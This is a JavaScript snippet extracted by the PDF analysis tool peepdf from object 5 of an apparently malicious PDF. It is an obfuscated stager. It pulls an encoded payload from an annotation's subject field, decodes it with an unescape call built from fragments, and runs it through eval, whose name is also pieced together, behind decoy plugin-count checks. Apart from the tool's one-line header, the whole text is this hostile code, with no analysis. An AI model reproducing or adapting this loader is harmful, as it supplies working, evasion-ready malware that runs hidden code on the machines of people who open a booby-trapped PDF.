// peepdf comment: Javascript code located in object 5 (version 0)

var sum = '';
var duct = 300;
var os = "";
var pr = null;
var num = 1;
var func = 'd';

app.doc.syncAnnotScan();
if (app.plugIns.length < 1) {
    func += "4";
    num = 0;
}

if (!(app.plugIns.length < 0)) {
    var xnm = {
        nPage: 0
    };
    pr = app.doc.getAnnots(xnm);
    sum = pr[num].subject;
}

if (app.plugIns.length > 2) {
    var buf = sum.split(/-/);
    var ap = this;
    var acc = ap["une" + "sca" + "pe"];
    var src = String["fromC" + "harC" + "ode"];

    for (var n = 0; n < buf.length - 1; n++) os += acc(src(37) + buf[n + 1]);

    func = "";

    if (app.plugIns.length > 0) {
        if (!(app.plugIns.length > 0)) {
            func += "abd";
            num = 123;
        }
        num = 0;
        ap['ev' + func + src(77 + 20) + "l"](os);
        num = 0;
    }
}

